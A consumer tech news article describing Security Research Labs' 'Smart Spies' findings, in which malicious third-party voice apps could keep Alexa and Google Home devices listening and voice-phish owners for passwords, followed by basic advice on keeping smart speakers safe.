The sneaky new way hackers can use Google Home and Alexa to steal your passwords
Smart speakers are hot items, but their rise to fame hasn’t been squeaky clean. Despite a good reception from critics and users, devices like the Amazon Echo and Google Home have been called out for troubling privacy issues — such as parent companies recording users. Click or tap to to see how Google does it.
Makers of smart speakers claim recording users is necessary to improve their AI technology. But in addition to playing it fast-and-loose with privacy, recording users opens up an entirely new can of worms: hackers taking advantage of the feature.
Now, security researchers have confirmed the worst. By designing malicious apps, researchers were able to hack the devices and record users at their leisure. This hack confirms bad actors could trick users into giving up private information. Here’s what we know, and what you can do to keep your smart speakers safe.
Smart spies
According to reports by cybersecurity researchers at Security Research Labs (SRL) in Germany, Google Home and Amazon Alexa devices are vulnerable to hacking, which makes them capable of spying on users. Worse, researchers determined the devices can be used to “vish,” or “voice phish,” their owners by using built-in features.
The security flaw has resulted in the devices being dubbed “Smart Spies.” This leads to several concerns over the implications of these vulnerabilities.
Security Research Labs is what the industry refers to as “white hat hackers,” which means they hack devices to help improve security instead of personal gain. To date, no hackers have exploited the Smart Spies flaw, but unless manufacturers act quickly, millions of users could be at risk.
How can my devices be hacked?
Here’s how it works: Nearly every smart speaker features a pause between the moment it finishes recording you and when it begins to speak. This pause can be easily altered by inserting an unpronounceable string of characters into the pre-written responses on the smart speaker. This would allow the app to continue recording the user without them knowing.
To create the exploit, SRL created an application that artificially extends the pause to allow for easy recording beyond the devices’ pre-determined limits. White hat hackers speculate malicious hackers could easily create an app that utilizes the pause and custom requests, such as asking the user to reset their password by voice. This would put nearly every smart speaker owner in harm’s way.
In an interesting twist, SRL specifically sites issues with the approval process at Google and Amazon as a major risk factor. To keep users safe, they call for “…a more thorough review process of (the) third-party Skills and Actions made available in their voice app stores.”
Judging by the presence of malicious apps on Google’s own app store, we’d say this is a significant concern. Click or tap to see some of the malicious apps discovered on the Google Play store.
How can I keep my smart speakers safe from this flaw?
As SRL eloquently put it, it’s the responsibility of manufacturers like Google and Amazon to keep their respective marketplaces free from malicious apps. In addition, these companies may want to re-evaluate their code structures for Alexa and Google Assistant to make sure factors like the “pause” aren’t exploited.
To keep your own devices safe, the best thing you can do is make sure you’re only downloading Alexa and Google Assistant apps from trusted developers; otherwise, you’re putting your privacy and safety up for grabs.
In addition, both devices feature “mic off” buttons prominently in their designs. When not in use, it’s always a good idea to turn the mic off. At least for now, Google and Amazon are far more interested in what you have to say than any hacker, but it’s best not to take any chances.
Tags: Amazon, cybersecurity, Google, security